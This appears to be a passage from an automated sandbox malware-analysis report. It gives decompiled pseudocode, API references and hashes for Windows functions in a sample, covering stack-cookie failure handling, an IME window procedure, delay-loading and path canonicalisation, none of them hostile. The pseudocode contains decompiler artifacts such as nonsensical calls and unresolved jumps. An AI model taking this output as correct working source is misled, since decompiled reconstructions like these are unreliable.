					 *0x45170 = __esi;
					 *0x4516c = __edi;
					 *0x45198 = ss;
					 *0x4518c = cs;
					 *0x45168 = ds;
					 *0x45164 = es;
					 *0x45160 = fs;
					 *0x4515c = gs;
					asm("pushfd");
					_pop( *0x45190);
					 *0x45184 =  *_t26;
					 *0x45188 = _v0;
					 *0x45194 =  &_a4;
					 *0x450d0 = 0x10001;
					 *0x4508c =  *0x45188;
					 *0x45080 = 0xc0000409;
					 *0x45084 = 1;
					_v812 =  *0x45040;
					_v808 =  *0x45044;
					SetUnhandledExceptionFilter(0);
					UnhandledExceptionFilter(E00043F68);
					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
				} else {
					return __eax;
				}
			}








                                                  0x0004118f
                                                  0x00043e94
                                                  0x00043e99
                                                  0x00043e9f
                                                  0x00043ea5
                                                  0x00043eab
                                                  0x00043eb1
                                                  0x00043eb7
                                                  0x00043ebd
                                                  0x00043ec3
                                                  0x00043ec9
                                                  0x00043ecf
                                                  0x00043ed5
                                                  0x00043edb
                                                  0x00043edc
                                                  0x00043ee5
                                                  0x00043eed
                                                  0x00043ef5
                                                  0x00043f00
                                                  0x00043f0f
                                                  0x00043f14
                                                  0x00043f1e
                                                  0x00043f2d
                                                  0x00043f38
                                                  0x00043f40
                                                  0x00043f4b
                                                  0x00043f64
                                                  0x00041195
                                                  0x00041195
                                                  0x00041195

                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00043F40
                                                  • UnhandledExceptionFilter.KERNEL32(00043F68), ref: 00043F4B
                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00043F56
                                                  • TerminateProcess.KERNEL32(00000000), ref: 00043F5D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                  • String ID:
                                                  • API String ID: 3231755760-0
                                                  • Opcode ID: 273cea3f3df8d37eca0a3490b5588365d4c53ea290892d2f9ef6b81ad00f4b10
                                                  • Instruction ID: 57b4ff92fb6afa135e894c11d63b8320e263f39f7c72e863adb44de4193133e4
                                                  • Opcode Fuzzy Hash: 273cea3f3df8d37eca0a3490b5588365d4c53ea290892d2f9ef6b81ad00f4b10
                                                  • Instruction Fuzzy Hash: 4A216DFC801A44AFE750EF69EF447483BB4BB0A346B905019E6088B272E7B85585CF5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0004119B Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 119COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 238 4119b-411c7 239 411cd-411d1 238->239 240 421f8-42206 GetWindowLongW 238->240 243 422e7-422ee 239->243 244 411d7-411e9 DefWindowProcW 239->244 241 422cc 240->241 242 4220c-4221c GetWindow 240->242 241->243 247 42222-42252 memset GetClassNameW 242->247 248 422cb 242->248 243->244 245 422f4-422f9 243->245 246 411ef-411fb call 41189 244->246 249 42305-42312 SetWindowLongW 245->249 250 422fb-422ff SetClassLongW 245->250 252 42254-42271 CompareStringW 247->252 253 4227a-42285 GetWindow 247->253 248->241 249->246 250->249 252->253 255 42273-42278 GetWindow 252->255 253->248 256 42287-42294 GetWindowLongW 253->256 255->253 256->248 257 42296-422a3 GetClassLongW 256->257 257->248 258 422a5-422c5 GetClassLongW SetWindowLongW SetClassLongW 257->258 258->248
                                                  C-Code - Quality: 86%
                                                  			E0004119B(void* __ebx, void* __edi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				signed int _v8;
				void _v166;
				short _v168;
				struct HWND__* _v172;
				long _v176;
				void* __esi;
				long _t25;
				long _t27;
				long _t38;
				long _t44;
				void* _t53;
				struct HWND__* _t55;
				signed int _t57;

				_t54 = __edi;
				_t47 = __ebx;
				_v8 =  *0x45040 ^ _t57;
				_t25 = _a16;
				_t56 = _a4;
				_v172 = _t56;
				_v176 = _t25;
				if(_a8 == 0x1c) {
					_push(__ebx);
					if(GetWindowLongW(_t56, 0) == 0) {
						L14:
						_pop(_t47);
						L2:
						_t27 = DefWindowProcW(_v172, _a8, _a12, _v176);
						L3:
						return E00041189(_t27, _t47, _v8 ^ _t57, _t53, _t54, _t56);
					}
					_push(__edi);
					_t56 = GetWindow;
					_t55 = GetWindow(GetWindow, 3);
					if(_t55 == 0) {
						L13:
						_pop(_t54);
						goto L14;
					}
					_v168 = 0;
					memset( &_v166, 0, 0x9e);
					if(GetClassNameW(_t55,  &_v168, 0x50) != 0 && CompareStringW(0x7f, 1,  &_v168, 0xffffffff, ?str?, 0xffffffff) == 2) {
						_t55 = GetWindow(_t55, 3);
					}
					if(GetWindow(_t55, 4) == _v172) {
						_t56 = GetWindowLongW(_t55, 0xffffffec);
						if((_t56 & 0x00040080) == 0 && GetClassLongW(_t55, 0xffffffde) == 0) {
							_t38 = GetClassLongW(_v172, 0xfffffff2);
							SetWindowLongW(_t55, 0xffffffec, _t56);
							SetClassLongW(_t55, 0xffffffde, _t38);
						}
					}
					goto L13;
				}
				if(_a8 == 0x4e) {
					if( *((intOrPtr*)(_t25 + 8)) != 0xfffffe0c) {
						goto L2;
					}
					_t44 =  *(_t25 + 0xc);
					if(_t44 != 0) {
						SetClassLongW(_t56, 0xfffffff2, _t44);
					}
					SetWindowLongW(_t56, 0, 1);
					_t27 = 0;
					goto L3;
				}
				goto L2;
			}
















                                                  0x0004119b
                                                  0x0004119b
                                                  0x000411ad
                                                  0x000411b4
                                                  0x000411b8
                                                  0x000411bb
                                                  0x000411c1
                                                  0x000411c7
                                                  0x000421f8
                                                  0x00042206
                                                  0x000422cc
                                                  0x000422cc
                                                  0x000411d7
                                                  0x000411e9
                                                  0x000411ef
                                                  0x000411fb
                                                  0x000411fb
                                                  0x0004220c
                                                  0x00042210
                                                  0x00042218
                                                  0x0004221c
                                                  0x000422cb
                                                  0x000422cb
                                                  0x00000000
                                                  0x000422cb
                                                  0x0004222a
                                                  0x00042238
                                                  0x00042252
                                                  0x00042278
                                                  0x00042278
                                                  0x00042285
                                                  0x0004228c
                                                  0x00042294
                                                  0x000422ad
                                                  0x000422bb
                                                  0x000422c5
                                                  0x000422c5
                                                  0x00042294
                                                  0x00000000
                                                  0x00042285
                                                  0x000411d1
                                                  0x000422ee
                                                  0x00000000
                                                  0x00000000
                                                  0x000422f4
                                                  0x000422f9
                                                  0x000422ff
                                                  0x000422ff
                                                  0x0004230a
                                                  0x00042310
                                                  0x00000000
                                                  0x00042310
                                                  0x00000000

                                                  APIs
                                                  • DefWindowProcW.USER32(?,0000004E,?,?), ref: 000411E9
                                                  • GetWindowLongW.USER32(?,00000000), ref: 00042202
                                                  • GetWindow.USER32(?,00000003), ref: 00042216
                                                  • memset.MSVCRT ref: 00042238
                                                  • GetClassNameW.USER32(00000000,?,00000050), ref: 0004224A
                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,IME,000000FF), ref: 00042268
                                                  • GetWindow.USER32(00000000,00000003), ref: 00042276
                                                  • GetWindow.USER32(00000000,00000004), ref: 0004227D
                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0004228A
                                                  • GetClassLongW.USER32 ref: 0004229F
                                                  • GetClassLongW.USER32 ref: 000422AD
                                                  • SetWindowLongW.USER32 ref: 000422BB
                                                  • SetClassLongW.USER32(00000000,000000DE,00000000), ref: 000422C5
                                                  • SetClassLongW.USER32(?,000000F2,0000004E), ref: 000422FF
                                                  • SetWindowLongW.USER32 ref: 0004230A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$Class$CompareNameProcStringmemset
                                                  • String ID: IME$N
                                                  • API String ID: 1578343765-3965882335
                                                  • Opcode ID: 1e1f4496f95872ec2fdbec538e1ef1139924ccdce9667ec5d5f4eed1c0ee6dea
                                                  • Instruction ID: f8cb4220f3f9d60662fb9541395479f856ad3d627a33b7d482f58d94ead6049c
                                                  • Opcode Fuzzy Hash: 1e1f4496f95872ec2fdbec538e1ef1139924ccdce9667ec5d5f4eed1c0ee6dea
                                                  • Instruction Fuzzy Hash: F441F3B4700314BBDF209B65CE44FEE76A8AF4A720F504261F615E61E0DBB48D808B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00043B77 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 111libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 259 43b77-43bbc 260 43bc1-43bc6 259->260 261 43bbe 259->261 262 43c40-43c44 260->262 263 43bc8-43bd7 LoadLibraryExA 260->263 261->260 266 43c46-43c4d 262->266 267 43c4f-43c53 262->267 264 43c1e-43c26 GetLastError 263->264 265 43bd9-43be6 InterlockedCompareExchange 263->265 270 43c2f-43c3b InterlockedCompareExchange 264->270 271 43c28-43c2d 264->271 268 43c13-43c1c FreeLibrary 265->268 269 43be8-43c07 265->269 272 43c82-43c8b DelayLoadFailureHook 266->272 267->272 273 43c55-43c64 GetProcAddress 267->273 268->262 269->262 276 43c09-43c11 269->276 270->266 278 43c3d 270->278 271->270 271->272 277 43c8d-43c91 272->277 274 43c66-43c6e GetLastError 273->274 275 43c77 273->275 274->275 279 43c70-43c75 274->279 280 43c7e-43c80 275->280 276->262 281 43c93-43c96 277->281 282 43c98-43c9e 277->282 278->262 279->275 279->280 280->272 280->277 281->282
                                                  C-Code - Quality: 83%
                                                  			E00043B77(struct HINSTANCE__* _a4, int* _a8) {
				signed int _v8;
				CHAR* _v12;
				struct HINSTANCE__* _v24;
				CHAR* _v36;
				void _v44;
				char _v48;
				struct HINSTANCE__* _t34;
				int _t37;
				int _t41;
				CHAR* _t45;
				signed short _t47;
				signed int _t48;
				void* _t51;
				struct HINSTANCE__* _t56;
				LONG* _t60;
				int _t61;
				int _t62;

				_t34 = _a4;
				_v8 = _v8 & 0x00000000;
				_t60 =  *((intOrPtr*)(_t34 + 8)) + 0x40000;
				_t51 =  *_t60;
				_t45 =  *((intOrPtr*)(_t34 + 4)) + 0x40000;
				_t47 =  *( *((intOrPtr*)(_t34 + 0x10)) + 0x40000 + (_a8 -  *((intOrPtr*)(_t34 + 0xc)) - 0x40000 >> 2) * 4);
				_a4 = _t51;
				_t13 = _t47 + 0x40002; // 0x80002
				_t37 = _t13;
				if(_t47 < 0) {
					_t37 = _t47 & 0x0000ffff;
				}
				_v12 = _t37;
				if(_t51 != 0) {
					L12:
					if(_a4 != 0xffffffff) {
						if(_a4 == 0) {
							L20:
							_push(_v12);
							_push(_t45);
							L00043CCE();
							_t61 = _t37;
							L21:
							if(_v8 != 0) {
								 *_a8 = _t61;
							}
							return _t61;
						}
						_t37 = GetProcAddress(_a4, _v12);
						_t61 = _t37;
						if(_t61 != 0) {
							L18:
							_v8 = 1;
							L19:
							if(_t61 != 0) {
								goto L21;
							}
							goto L20;
						}
						_t37 = GetLastError();
						if(_t37 == 0x7f || _t37 == 0xb6) {
							goto L18;
						} else {
							goto L19;
						}
					}
					L13:
					_v8 = 1;
					goto L20;
				}
				_t56 = LoadLibraryExA(_t45, _t51, _t51);
				_a4 = _t56;
				if(_t56 == 0) {
					_t37 = GetLastError();
					if(_t37 == 0x7e || _t37 == 0xc1) {
						_t37 = InterlockedCompareExchange(_t60, 0xffffffff, 0);
						if(_t37 == 0) {
							goto L13;
						}
						_a4 = _t37;
						goto L12;
					} else {
						goto L20;
					}
				}
				_t41 = InterlockedCompareExchange(_t60, _t56, 0);
				_t62 = _t41;
				if(_t62 != 0) {
					_t37 = FreeLibrary(_t56);
					_a4 = _t62;
				} else {
					_t48 = 8;
					memset( &_v44, _t41, _t48 << 2);
					_v24 = _a4;
					_t37 =  *0x43ca4; // 0x0
					_v48 = 0x24;
					_v36 = _t45;
					if(_t37 != 0) {
						_t37 =  *_t37(5,  &_v48);
					}
				}
				goto L12;
			}




















                                                  0x00043b7f
                                                  0x00043b82
                                                  0x00043ba2
                                                  0x00043ba4
                                                  0x00043bad
                                                  0x00043baf
                                                  0x00043bb1
                                                  0x00043bb4
                                                  0x00043bb4
                                                  0x00043bbc
                                                  0x00043bbe
                                                  0x00043bbe
                                                  0x00043bc1
                                                  0x00043bc6
                                                  0x00043c40
                                                  0x00043c44
                                                  0x00043c53
                                                  0x00043c82
                                                  0x00043c82
                                                  0x00043c85
                                                  0x00043c86
                                                  0x00043c8b
                                                  0x00043c8d
                                                  0x00043c91
                                                  0x00043c96
                                                  0x00043c96
                                                  0x00043c9e
                                                  0x00043c9e
                                                  0x00043c5b
                                                  0x00043c60
                                                  0x00043c64
                                                  0x00043c77
                                                  0x00043c77
                                                  0x00043c7e
                                                  0x00043c80
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00043c80
                                                  0x00043c66
                                                  0x00043c6e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00043c6e
                                                  0x00043c46
                                                  0x00043c46
                                                  0x00000000
                                                  0x00043c46
                                                  0x00043bd0
                                                  0x00043bd2
                                                  0x00043bd7
                                                  0x00043c1e
                                                  0x00043c26
                                                  0x00043c34
                                                  0x00043c3b
                                                  0x00000000
                                                  0x00000000
                                                  0x00043c3d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00043c26
                                                  0x00043bdd
                                                  0x00043be2
                                                  0x00043be6
                                                  0x00043c14
                                                  0x00043c19
                                                  0x00043be8
                                                  0x00043bea
                                                  0x00043bee
                                                  0x00043bf3
                                                  0x00043bf6
                                                  0x00043bfb
                                                  0x00043c02
                                                  0x00043c07
                                                  0x00043c0f
                                                  0x00043c0f
                                                  0x00043c07
                                                  0x00000000

                                                  APIs
                                                  • LoadLibraryExA.KERNEL32(00000000), ref: 00043BCB
                                                  • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00043BDD
                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00043C14
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00043C5B
                                                  • GetLastError.KERNEL32(00000000,00000000), ref: 00043C66
                                                  • DelayLoadFailureHook.KERNEL32(00000000,00000000), ref: 00043C86
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$AddressCompareDelayErrorExchangeFailureFreeHookInterlockedLastProc
                                                  • String ID: $
                                                  • API String ID: 3506490669-3993045852
                                                  • Opcode ID: 4e38aa845ffde29792e7ee2ed045ecdae4d34d9aef074966e2cafc82ed956215
                                                  • Instruction ID: 92f7d381e86d209566b6a78ca588a7fc3dcd920786c44ca8cf94b972a21cda5e
                                                  • Opcode Fuzzy Hash: 4e38aa845ffde29792e7ee2ed045ecdae4d34d9aef074966e2cafc82ed956215
                                                  • Instruction Fuzzy Hash: 14319FF1900219AFDB259F68C8C5BEDB7E4AF54750F25A139F904BB292C770DB408B98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00041C02 Relevance: 15.1, APIs: 10, Instructions: 87libraryloaderstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E00041C02(struct HINSTANCE__* _a4, short* _a8, intOrPtr* _a12) {
				_Unknown_base(*)()* _v8;
				WCHAR* _t21;
				_Unknown_base(*)()* _t30;
				_Unknown_base(*)()* _t32;
				void* _t39;
				short* _t41;
				int _t44;
				int _t49;
				_Unknown_base(*)()** _t51;

				 *_a12 = 0;
				_t21 = _a8;
				_v8 = 0;
				if(_t21 == 0) {
					L7:
					return _v8;
				}
				if( *_t21 == 0x23) {
					_t41 =  &(_t21[1]);
					if( *_t41 == 0) {
						goto L2;
					}
					__imp___wtoi(_t41);
					_v8 = GetProcAddress(_a4, _t21 & 0x0000ffff);
					goto L7;
				}
				L2:
				_t49 = lstrlenW(_t21) + 1;
				_t44 = _t49 + _t49;
				_t5 = _t44 + 2; // 0x2
				_t39 = LocalAlloc(0, _t5);
				if(_t39 == 0) {
					L6:
					goto L7;
				}
				if(WideCharToMultiByte(0, 0x400, _a8, _t49, _t39, _t44, 0, 0) != 0) {
					_t51 = _t39 + lstrlenA(_t39);
					 *_t51 = 0x57;
					 *((char*)(_t51 + 1)) = 0;
					_t30 = GetProcAddress(_a4, _t39);
					_v8 = _t30;
					if(_t30 == 0) {
						 *_a12 = 1;
						 *_t51 = 0x41;
						_t32 = GetProcAddress(_a4, _t39);
						_v8 = _t32;
						if(_t32 == 0) {
							 *_t51 = _t32;
							_v8 = GetProcAddress(_a4, _t39);
						}
					}
				}
				LocalFree(_t39);
				goto L6;
			}












                                                  0x00041c0e
                                                  0x00041c10
                                                  0x00041c13
                                                  0x00041c18
                                                  0x00041c8f
                                                  0x00041c94
                                                  0x00041c94
                                                  0x00041c1e
                                                  0x0004238a
                                                  0x00042390
                                                  0x00000000
                                                  0x00000000
                                                  0x00042397
                                                  0x000423ab
                                                  0x00000000
                                                  0x000423ab
                                                  0x00041c24
                                                  0x00041c2f
                                                  0x00041c30
                                                  0x00041c33
                                                  0x00041c3e
                                                  0x00041c44
                                                  0x00041c8d
                                                  0x00000000
                                                  0x00041c8e
                                                  0x00041c5c
                                                  0x00041c6f
                                                  0x00041c72
                                                  0x00041c75
                                                  0x00041c79
                                                  0x00041c7b
                                                  0x00041c80
                                                  0x0004214e
                                                  0x00042154
                                                  0x00042157
                                                  0x00042159
                                                  0x0004215e
                                                  0x00042168
                                                  0x0004216c
                                                  0x0004216c
                                                  0x0004215e
                                                  0x00041c80
                                                  0x00041c87
                                                  0x00000000

                                                  APIs
                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000001,?,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000), ref: 00041C27
                                                  • LocalAlloc.KERNEL32(00000000,00000002,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C38
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,00000001,00000000,00000000,00000000,00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?), ref: 00041C54
                                                  • lstrlenA.KERNEL32(00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C5F
                                                  • GetProcAddress.KERNEL32(?,00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C79
                                                  • LocalFree.KERNEL32(00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C87
                                                  • GetProcAddress.KERNEL32(?,00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00042157
                                                  • GetProcAddress.KERNEL32(?,00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 0004216A
                                                  • _wtoi.MSVCRT ref: 00042397
                                                  • GetProcAddress.KERNEL32(?,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 000423A5
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Locallstrlen$AllocByteCharFreeMultiWide_wtoi
                                                  • String ID:
                                                  • API String ID: 2554484480-0
                                                  • Opcode ID: 8309fffa9f999e578165bcf3b45a9dd69c78264fc7a57308971e7e52311094da
                                                  • Instruction ID: b0f8e73b7755195723cb89846d9a0cbdbf842b29272f52a5b11a530ae5137848
                                                  • Opcode Fuzzy Hash: 8309fffa9f999e578165bcf3b45a9dd69c78264fc7a57308971e7e52311094da
                                                  • Instruction Fuzzy Hash: C3218DF9900245FFDB209F64CD889AABBECEF09355B104469F945D7220D7B4DD80DB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00043168 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 394COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 70%
                                                  			E00043168(void* __ecx, short* _a4, char _a8, wchar_t* _a12, signed int _a16) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _t121;
				intOrPtr _t124;
				signed int _t125;
				int _t128;
				intOrPtr* _t131;
				signed int _t136;
				short _t138;
				short _t140;
				intOrPtr* _t142;
				signed int _t155;
				wchar_t* _t156;
				wchar_t* _t157;
				intOrPtr _t163;
				signed int _t164;
				wchar_t* _t166;
				signed int _t170;
				intOrPtr _t171;
				signed int _t175;
				intOrPtr _t182;
				int _t185;
				short* _t190;
				wchar_t* _t192;
				signed int _t195;
				void* _t196;
				signed int _t197;
				intOrPtr _t198;
				intOrPtr _t199;
				signed int _t201;
				long _t203;
				void* _t208;
				void* _t209;
				long* _t211;
				wchar_t* _t214;
				char _t216;
				void* _t218;
				short* _t220;
				signed int _t221;

				_t190 = _a4;
				_t216 = _a8;
				_v20 = 0;
				_t121 = E00041AE1(_t190, _t216, E00041460);
				_v8 = _t121;
				if(_t121 < 0) {
					L113:
					return _t121;
				} else {
					if(_t216 > 0x8000) {
						return 0x80070057;
					}
					if(_t216 <= 0x104) {
						_a16 = _a16 & 0xfffffffe;
					}
					_t195 = _a16 & 0x00000001;
					_v16 = _t195;
					if(_t195 == 0 && _t216 > 0x104) {
						_t216 = 0x104;
						_a8 = 0x104;
					}
					_v12 = _t216;
					_t124 = E00042D2E(_a12,  &_v24);
					_v28 = _t124;
					if(_t124 == 0) {
						_t214 = _a12;
						_t217 = L"\\\\?\\";
						_a16 = _t190;
						_t125 = E00042815(_t214, L"\\\\?\\", 4);
						_v24 = _t125;
						if(_t125 == 0) {
							_t128 = iswalpha( *_t214 & 0x0000ffff);
							_pop(_t196);
							if(_t128 != 0 && _t214[0] == 0x3a) {
								_v24 = 1;
							}
						} else {
							_t192 =  &(_t214[2]);
							_t185 = iswalpha( *_t192 & 0x0000ffff);
							_pop(_t196);
							if(_t185 == 0 || _t214[2] != 0x3a) {
								_v24 = _v24 & 0x00000000;
							} else {
								_t214 = _t192;
							}
							_t190 = _a4;
						}
						if(_v16 == 0) {
							goto L32;
						} else {
							if(_v24 == 0) {
								goto L26;
							}
							_v20 = 4;
							_t182 = E00042A67(_t196, _t190, _a8, _t217,  &_a16,  &_v12, 0);
							goto L25;
						}
					} else {
						_push(0);
						_push( &_v12);
						_push( &_a16);
						if(_v16 == 0) {
							_push(L"\\\\");
						} else {
							_v20 = 6;
							_push(L"\\\\?\\UNC\\");
						}
						_push(_t216);
						_push(_t190);
						_t182 = E00042A67(_t195);
						_t214 = _v24;
						L25:
						_v8 = _t182;
						L26:
						if(_v16 != 0) {
							_t175 = _v20;
							if(_t175 != 0 && _a8 <= _t175 + 0x104) {
								if(_a8 > 0x104) {
									_a8 = 0x104;
								}
								_t214 = _a12;
								_v20 = _v20 & 0x00000000;
								_v12 = _a8;
								_a16 = _t190;
								_v8 = E00041AE1(_t190, _a8, E00041460);
							}
						}
						L32:
						if(_v8 < 0) {
							L79:
							E00041AE1(_t190, _a8, E00041460);
							_t121 = _v8;
							if(_t121 != 0x8007007a) {
								goto L113;
							}
							if(_v16 != 0) {
								L83:
								if(_a8 != 0x8000) {
									goto L113;
								}
								L84:
								return 0x800700ce;
							}
							if(_a8 == 0x104) {
								goto L84;
							}
							if(_v16 == 0) {
								goto L113;
							}
							goto L83;
						}
						while( *_t214 != 0) {
							_t156 = wcschr(_t214, 0x5c);
							_pop(_t203);
							_a12 = _t156;
							if(_t156 == 0) {
								_t157 = _t214;
								_t211 =  &(_t157[0]);
								do {
									_t203 =  *_t157;
									_t157 =  &(_t157[0]);
								} while (_t203 != 0);
								_t221 = _t157 - _t211 >> 1;
								L39:
								if(_t221 <= 0x100 || _v16 != 0) {
									if(_t221 >= 0x8000) {
										goto L76;
									}
									if(_t221 != 1) {
										if(_t221 != 2) {
											if(_t221 == 0 &&  *_t214 == 0x5c) {
												_t221 = _t221 + 1;
											}
											L63:
											_t163 = E00042B88(_t203, _a16, _v12, _t214, _t221,  &_a16,  &_v12, 0);
											_v8 = _t163;
											if(_t163 != 0x8007007a || _t221 != 1 ||  *_t214 != 0x5c) {
												L73:
												_t214 = _t214 + _t221 * 2;
												L74:
												if(_v8 < 0) {
													break;
												}
												continue;
											} else {
												_t164 = _t214[0] & 0x0000ffff;
												if(_t164 == 0 || _t164 == 0x2e && _t214[1] == 0) {
													_v8 = 0;
													break;
												} else {
													if(_v12 == 1 && _t164 == 0x2e && _t214[1] == _t164) {
														_a16 = _a16 + 2;
														 *_a16 = 0;
														_v12 = 0;
														_v8 = 0;
													}
													goto L73;
												}
											}
										}
										if( *_t214 != 0x2e || _t214[0] != 0x2e) {
											goto L63;
										} else {
											if(_a16 <= _t190 || E00042DA5(_t190) != 0) {
												_t166 = _a12;
												if(_t166 != 0) {
													L45:
													_t214 =  &(_t166[0]);
													goto L74;
												}
												goto L59;
											} else {
												_t170 = E0004286E(_t190, _a16 + 0xfffffffe);
												_a16 = _t170;
												_t171 = _a8;
												if(_t170 == 0) {
													_a16 = _t190;
												} else {
													_t171 = _t171 - (_a16 - _t190 >> 1);
												}
												_v12 = _t171;
												_v8 = E00041AE1(_a16, _t171, E00041460);
												L59:
												_t214 =  &(_t214[1]);
												goto L74;
											}
										}
									}
									if( *_t214 != 0x2e) {
										goto L63;
									}
									_t166 = _a12;
									if(_t166 == 0) {
										_t214 =  &(_t214[0]);
										if(_a16 > _t190 && E00042DA5(_t190) == 0) {
											_a16 = _a16 - 2;
											_v12 = _v12 + 1;
											_v8 = E00041AE1(_a16, _v12, E00041460);
										}
										goto L74;
									}
									goto L45;
								} else {
									L76:
									_v8 = 0x800700ce;
									goto L79;
								}
							}
							_t221 = _t156 - _t214 >> 1;
							goto L39;
						}
						if(_v8 >= 0) {
							_t197 = _a16;
							if(_t197 <= _t190) {
								L92:
								_t131 = _t190;
								_t208 = _t131 + 2;
								do {
									_t198 =  *_t131;
									_t131 = _t131 + 2;
								} while (_t198 != 0);
								_t218 = _t190 + (_t131 - _t208 >> 1) * 2;
								if(_t218 >= _t190 + 0xe) {
									_t220 = _t218 - 0xe;
									if(E00042815(_t220, L"::$DATA", 7) != 0) {
										 *_t220 = 0;
									}
								}
								_t136 = _v20;
								if(_t136 == 0) {
									L105:
									if(_a8 > 1 &&  *_t190 == 0) {
										_t140 = 0x5c;
										 *_t190 = _t140;
										 *((short*)(_t190 + 2)) = 0;
									}
									if(_a8 > 3 &&  *((short*)(_t190 + 2)) == 0x3a &&  *((intOrPtr*)(_t190 + 4)) == 0) {
										_t138 = 0x5c;
										 *((short*)(_t190 + 4)) = _t138;
										 *((short*)(_t190 + 6)) = 0;
									}
									return 0;
								} else {
									_t142 = _t190 + _t136 * 2;
									_t209 = _t142 + 2;
									do {
										_t199 =  *_t142;
										_t142 = _t142 + 2;
									} while (_t199 != 0);
									if(_t142 - _t209 >> 1 < 0x104) {
										if(_v28 == 0) {
											_push(_t190 + 8);
											_push(_a8);
											_push(_t190);
										} else {
											_push(_t190 + 0x10);
											_push(_a8 + 0xfffffffe);
											_push(_t190 + 4);
										}
										E00041AE1();
									}
									goto L105;
								}
							}
							_t201 = _t197;
							if( *_t201 != 0x2e) {
								goto L92;
							}
							while(_t201 != _t190) {
								_t155 = _t201 - 2;
								if( *_t155 == 0x2a) {
									goto L92;
								}
								 *_t201 = 0;
								_t201 = _t155;
								if( *_t155 != 0x2e) {
									goto L92;
								}
							}
							 *_t201 = 0;
							goto L92;
						}
						goto L79;
					}
				}
			}














































                                                  0x00043171
                                                  0x00043175
                                                  0x00043182
                                                  0x00043185
                                                  0x0004318c
                                                  0x0004318f
                                                  0x000435cc
                                                  0x000435cc
                                                  0x00043195
                                                  0x0004319b
                                                  0x00000000
                                                  0x0004319d
                                                  0x000431ae
                                                  0x000431b0
                                                  0x000431b0
                                                  0x000431b7
                                                  0x000431ba
                                                  0x000431bd
                                                  0x000431c3
                                                  0x000431c5
